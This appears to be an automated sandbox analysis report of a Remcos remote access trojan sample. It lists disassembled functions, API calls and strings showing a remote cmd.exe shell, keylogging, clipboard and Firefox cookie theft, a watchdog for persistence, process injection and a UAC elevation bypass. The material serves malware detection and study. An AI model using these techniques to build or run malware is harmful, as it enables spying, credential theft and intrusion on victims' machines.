GetStdHandle.KERNEL32(000000F6), ref: 00449C3C
GetFileType.KERNELBASE(00000000), ref: 00449C4E

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
Instruction ID: 67a772f1b96ce562b336c628e562ce1c63ba93f9b2d947f4b03656f810f331b8
Opcode Fuzzy Hash: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
Instruction Fuzzy Hash: E61160315047524AE7304E3E8CC86677AD5AB56335B380B2FD5B6876F1C638DC82AA49

Uniqueness

Uniqueness Score: -1.00%

Function 004484CA Relevance: 3.1, APIs: 2, Instructions: 65
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 0044852A
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8

Uniqueness

Uniqueness Score: -1.00%

Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D

Uniqueness

Uniqueness Score: -1.00%

Function 00445AF3 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000), ref: 00445B34

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC

Uniqueness

Uniqueness Score: -1.00%

Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004056E6

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

__Init_thread_footer.LIBCMT ref: 00405723
CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
TerminateProcess.KERNEL32(00000000), ref: 00405A17
CloseHandle.KERNEL32 ref: 00405A23
CloseHandle.KERNEL32 ref: 00405A2B
CloseHandle.KERNEL32 ref: 00405A3D
CloseHandle.KERNEL32 ref: 00405A45

Strings

0lG, xrefs: 00405954
0lG, xrefs: 00405A2D
0lG, xrefs: 0040585A
kG, xrefs: 004057DB
SystemDrive, xrefs: 00405761
0lG, xrefs: 00405988
cmd.exe, xrefs: 0040574D
0lG, xrefs: 004056D0

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
API String ID: 2994406822-18413064
Opcode ID: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
Opcode Fuzzy Hash: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D

Uniqueness

Uniqueness Score: -1.00%

Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00412106

Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
CloseHandle.KERNEL32(00000000), ref: 00412155
CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A

Strings

\SysWOW64\, xrefs: 00412261
WinDir, xrefs: 0041221B, 00412270
\system32\, xrefs: 00412209
Remcos restarted by watchdog!, xrefs: 00412160
Watchdog module activated, xrefs: 00412184, 004123DC
Watchdog launch failed!, xrefs: 00412383
fsutil.exe, xrefs: 0041230F
svchost.exe, xrefs: 004122C5
WDH, xrefs: 004121B5, 004121BB, 00412420
rmclient.exe, xrefs: 004122EA

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
API String ID: 3018269243-13974260
Opcode ID: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
Opcode Fuzzy Hash: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E

Uniqueness

Uniqueness Score: -1.00%

Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004168C2
EmptyClipboard.USER32 ref: 004168D0
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
GlobalLock.KERNEL32(00000000), ref: 004168F9
GlobalUnlock.KERNEL32(00000000), ref: 0041692F
SetClipboardData.USER32(0000000D,00000000), ref: 00416938
CloseClipboard.USER32 ref: 00416955
OpenClipboard.USER32 ref: 0041695C
GetClipboardData.USER32(0000000D), ref: 0041696C
GlobalLock.KERNEL32(00000000), ref: 00416975
GlobalUnlock.KERNEL32(00000000), ref: 0041697E
CloseClipboard.USER32 ref: 00416984

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID: !D@
API String ID: 3520204547-604454484
Opcode ID: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
Opcode Fuzzy Hash: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563

Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208

CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E

Strings

C:\Program Files(x86)\Internet Explorer\, xrefs: 0040F6BE
ieinstal.exe, xrefs: 0040F6D5
ielowutil.exe, xrefs: 0040F716
Inj, xrefs: 0040F769

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
API String ID: 3756808967-1743721670
Opcode ID: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
Opcode Fuzzy Hash: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON

Download Yara Rule

Strings

6, xrefs: 00419813
1, xrefs: 00419695
3, xrefs: 00419754
VG, xrefs: 0041968B
0, xrefs: 00419651
5, xrefs: 00419809
2, xrefs: 004196F4
4, xrefs: 004197B8
7, xrefs: 0041982A

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7$VG
API String ID: 0-1861860590
Opcode ID: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
Opcode Fuzzy Hash: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00407521
CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

Strings

$, xrefs: 0040753B
[+] CoGetObject, xrefs: 00407561
[-] CoGetObject FAILURE, xrefs: 0040758E
[+] CoGetObject SUCCESS, xrefs: 00407595
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 00407516, 0040751B, 0040755A
Elevation:Administrator!new:, xrefs: 00407542
[+] ucmAllocateElevatedObject, xrefs: 00407508

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Object_wcslen
String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 240030777-3166923314
Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
GetLastError.KERNEL32 ref: 0041A7BB
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
Opcode Fuzzy Hash: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
IsValidCodePage.KERNEL32(00000000), ref: 00452777
IsValidLocale.KERNEL32(?,00000001), ref: 00452786
GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED

Strings

lJD, xrefs: 00452745, 004526F2, 004526E7
lJD, xrefs: 00452626, 004527C5
lJD, xrefs: 00452639, 00452649, 00452709, 004526AB, 004526A0, 004526A3, 004526AE, 0045270C

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: lJD$lJD$lJD
API String ID: 745075371-479184356
Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
FindClose.KERNEL32(00000000), ref: 0040C47D
FindClose.KERNEL32(00000000), ref: 0040C4A8

Strings

\cookies.sqlite, xrefs: 0040C409
AppData, xrefs: 0040C358
\Mozilla\Firefox\Profiles\, xrefs: 0040C36E

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 1164774033-405221262
Opcode ID: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
Opcode Fuzzy Hash: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2B8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
GetLastError.KERNEL32 ref: 0040A2ED

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
TranslateMessage.USER32(?), ref: 0040A34A
DispatchMessageA.USER32(?), ref: 0040A355

Strings

`Wu, xrefs: 0040A2D3
Keylogger initialization failure: error , xrefs: 0040A301

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error $`Wu
API String ID: 3219506041-303027793
Opcode ID: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
Opcode Fuzzy Hash: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B

Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371

GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0040A416
GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
GetKeyboardLayout.USER32(00000000), ref: 0040A429
GetKeyState.USER32(00000010), ref: 0040A433
GetKeyboardState.USER32(?), ref: 0040A43E
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
String ID:
API String ID: 1888522110-0
Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00449212
_free.LIBCMT ref: 00449236
_free.LIBCMT ref: 004493BD
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
_free.LIBCMT ref: 00449589

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
Opcode Fuzzy Hash: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758

Uniqueness

Uniqueness Score: -1.00%

Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D

ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
GetProcAddress.KERNEL32(00000000), ref: 00416872

Strings

!D@, xrefs: 00417089
SetSuspendState, xrefs: 00416861
PowrProf.dll, xrefs: 00416866

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: !D@$PowrProf.dll$SetSuspendState
API String ID: 1589313981-2876530381
Opcode ID: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
Opcode Fuzzy Hash: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
